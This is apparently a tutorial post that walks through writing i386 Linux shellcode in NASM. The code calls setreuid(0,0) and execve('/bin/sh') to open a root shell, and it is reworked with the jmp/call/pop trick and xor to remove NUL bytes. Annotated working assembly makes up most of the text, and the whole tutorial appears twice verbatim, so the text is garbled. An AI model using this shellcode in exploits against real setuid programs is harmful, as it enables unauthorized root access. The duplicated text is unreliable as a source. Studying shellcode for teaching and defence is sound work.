Writing shellcode is an interesting thing, so let me do it myself!
The first version of it is not real shellcode, but it looks like it!
section .data
filepath db "/bin/shXAAAABBBB" ; the string: "/bin/sh", one byte ('X') that is overwritten with NUL at run time, then two 4-byte slots ("AAAA" -> argv[0], "BBBB" -> NULL terminator) filled in below
section .text
global _start
_start ; NOTE(review): NASM accepts a bare label but warns about it; "_start:" is the usual form
;; setreuid(uid_t ruid,uid_t euid) -- i386 Linux syscall #70 is setreuid (the original comment calls it "setruid")
mov eax,70 ; syscall number
mov ebx,0 ; ruid = 0 (root)
mov ecx,0 ; euid = 0 (root)
int 0x80
;; execve(const char *filename,char *const argv[],char *const envp[]) -- syscall #11
mov eax,0 ; eax = 0: al is used as the NUL terminator byte, eax as the NULL pointer
mov ebx,filepath ; ebx = &filepath (absolute address of the .data string; this is why this version is not position-independent)
mov [ebx+7],al ; filepath[7] = 0: terminates "/bin/sh" (overwrites the 'X'); .data is writable, so this store is fine
mov [ebx+8],ebx ; filepath[8..11] = &filepath: argv[0] (overwrites "AAAA")
mov [ebx+12],eax ; filepath[12..15] = NULL: argv[1] terminator (overwrites "BBBB")
mov eax,11 ; execve syscall number
lea ecx,[ebx+8] ; ecx = argv = &filepath[8]
lea edx,[ebx+12] ; edx = envp = &filepath[12] (points at the NULL word, i.e. an empty environment)
int 0x80
The second version: you can see that we have moved the data segment into the code segment.
;; setreuid(uid_t ruid,uid_t euid) -- i386 Linux syscall #70 is setreuid (the original comment calls it "setruid")
mov al,70 ; syscall number; only the low byte of eax is written, so this assumes the upper 24 bits of eax are already zero (true at process entry when run as a standalone program, unlike "mov eax,70" in the first version)
; mov ebx,0 ; set real uid to root -- kept for comparison: this encoding contains zero bytes
xor ebx,ebx ; ebx = 0 (real uid = root) with no zero bytes in the encoding
; mov ecx,0 ; set effective uid to root
xor ecx,ecx ; ecx = 0 (effective uid = root), same reason
int 0x80
jmp short two ; forward jump to the call below; "short" forces the one-byte displacement form
one:
pop ebx ; the "return address" pushed by "call one" is the address of the string that follows the call
;; so ebx now holds the address of the string
;; execve(const char *filename,char *const argv[],char *const envp[]) -- syscall #11
;; mov eax,0 -- replaced by the xor below for the zero-byte reason explained in the text
xor eax,eax ; eax = 0: al is the NUL terminator byte, eax is the NULL pointer
mov [ebx+7],al ; string[7] = 0: terminates "/bin/sh" (overwrites the 'X')
mov [ebx+8],ebx ; string[8..11] = address of the string: argv[0] (overwrites "AAAA")
mov [ebx+12],eax ; string[12..15] = NULL: argv[1] terminator (overwrites "BBBB")
;; NOTE(review): the three stores above write into the string after "call one", i.e. into the same section as the code; whether that memory is writable depends on how these bytes are loaded
mov al,11 ; execve syscall number (low byte only; eax was zeroed above, so the full register is exactly 11)
lea ecx,[ebx+8] ; ecx = argv = &string[8]
lea edx,[ebx+12] ; edx = envp = &string[12] (points at the NULL word, i.e. an empty environment)
int 0x80
two:
call one ; pushes the address of the following string as the "return address", then jumps to one
db "/bin/shXAAAABBBB" ; "/bin/sh", one byte ('X') to be overwritten with NUL, then two 4-byte slots (argv[0], argv[1]/envp)
Be careful: the code "xor eax,eax" does the same thing as "mov eax,0", but why do we use it?
Because "mov eax,0" assembles to "b8 00 00 00 00"; the zero bytes would end the shellcode (in C, the 0 byte is the end of a string).
And we change "mov eax,70" to "mov al,70" for the same reason.
Try to look at the executable code yourself. If you do not know how to see it, or you do not have a hex editor, you can try the hexedit written by me; I have given the source code before. It is written in C: copy it, and compile it with gcc like this "gcc -o hexedit hexedit.c", and then you can use it to see the shellcode. For me it is like this "./hexedit shellcode".
Now we have done half of it; to write good shellcode, let's go farther!
The first version of it is not real shellcode, but it looks like it!
section .data
filepath db "/bin/shXAAAABBBB" ; the string: "/bin/sh", one byte ('X') that is overwritten with NUL at run time, then two 4-byte slots ("AAAA" -> argv[0], "BBBB" -> NULL terminator) filled in below
section .text
global _start
_start ; NOTE(review): NASM accepts a bare label but warns about it; "_start:" is the usual form
;; setreuid(uid_t ruid,uid_t euid) -- i386 Linux syscall #70 is setreuid (the original comment calls it "setruid")
mov eax,70 ; syscall number
mov ebx,0 ; ruid = 0 (root)
mov ecx,0 ; euid = 0 (root)
int 0x80
;; execve(const char *filename,char *const argv[],char *const envp[]) -- syscall #11
mov eax,0 ; eax = 0: al is used as the NUL terminator byte, eax as the NULL pointer
mov ebx,filepath ; ebx = &filepath (absolute address of the .data string; this is why this version is not position-independent)
mov [ebx+7],al ; filepath[7] = 0: terminates "/bin/sh" (overwrites the 'X'); .data is writable, so this store is fine
mov [ebx+8],ebx ; filepath[8..11] = &filepath: argv[0] (overwrites "AAAA")
mov [ebx+12],eax ; filepath[12..15] = NULL: argv[1] terminator (overwrites "BBBB")
mov eax,11 ; execve syscall number
lea ecx,[ebx+8] ; ecx = argv = &filepath[8]
lea edx,[ebx+12] ; edx = envp = &filepath[12] (points at the NULL word, i.e. an empty environment)
int 0x80
The second version: you can see that we have moved the data segment into the code segment.
;; setreuid(uid_t ruid,uid_t euid) -- i386 Linux syscall #70 is setreuid (the original comment calls it "setruid")
mov al,70 ; syscall number; only the low byte of eax is written, so this assumes the upper 24 bits of eax are already zero (true at process entry when run as a standalone program, unlike "mov eax,70" in the first version)
; mov ebx,0 ; set real uid to root -- kept for comparison: this encoding contains zero bytes
xor ebx,ebx ; ebx = 0 (real uid = root) with no zero bytes in the encoding
; mov ecx,0 ; set effective uid to root
xor ecx,ecx ; ecx = 0 (effective uid = root), same reason
int 0x80
jmp short two ; forward jump to the call below; "short" forces the one-byte displacement form
one:
pop ebx ; the "return address" pushed by "call one" is the address of the string that follows the call
;; so ebx now holds the address of the string
;; execve(const char *filename,char *const argv[],char *const envp[]) -- syscall #11
;; mov eax,0 -- replaced by the xor below for the zero-byte reason explained in the text
xor eax,eax ; eax = 0: al is the NUL terminator byte, eax is the NULL pointer
mov [ebx+7],al ; string[7] = 0: terminates "/bin/sh" (overwrites the 'X')
mov [ebx+8],ebx ; string[8..11] = address of the string: argv[0] (overwrites "AAAA")
mov [ebx+12],eax ; string[12..15] = NULL: argv[1] terminator (overwrites "BBBB")
;; NOTE(review): the three stores above write into the string after "call one", i.e. into the same section as the code; whether that memory is writable depends on how these bytes are loaded
mov al,11 ; execve syscall number (low byte only; eax was zeroed above, so the full register is exactly 11)
lea ecx,[ebx+8] ; ecx = argv = &string[8]
lea edx,[ebx+12] ; edx = envp = &string[12] (points at the NULL word, i.e. an empty environment)
int 0x80
two:
call one ; pushes the address of the following string as the "return address", then jumps to one
db "/bin/shXAAAABBBB" ; "/bin/sh", one byte ('X') to be overwritten with NUL, then two 4-byte slots (argv[0], argv[1]/envp)
Be careful: the code "xor eax,eax" does the same thing as "mov eax,0", but why do we use it?
Because "mov eax,0" assembles to "b8 00 00 00 00"; the zero bytes would end the shellcode (in C, the 0 byte is the end of a string).
And we change "mov eax,70" to "mov al,70" for the same reason.
Try to look at the executable code yourself. If you do not know how to see it, or you do not have a hex editor, you can try the hexedit written by me; I have given the source code before. It is written in C: copy it, and compile it with gcc like this "gcc -o hexedit hexedit.c", and then you can use it to see the shellcode. For me it is like this "./hexedit shellcode".
Now we have done half of it; to write good shellcode, let's go farther!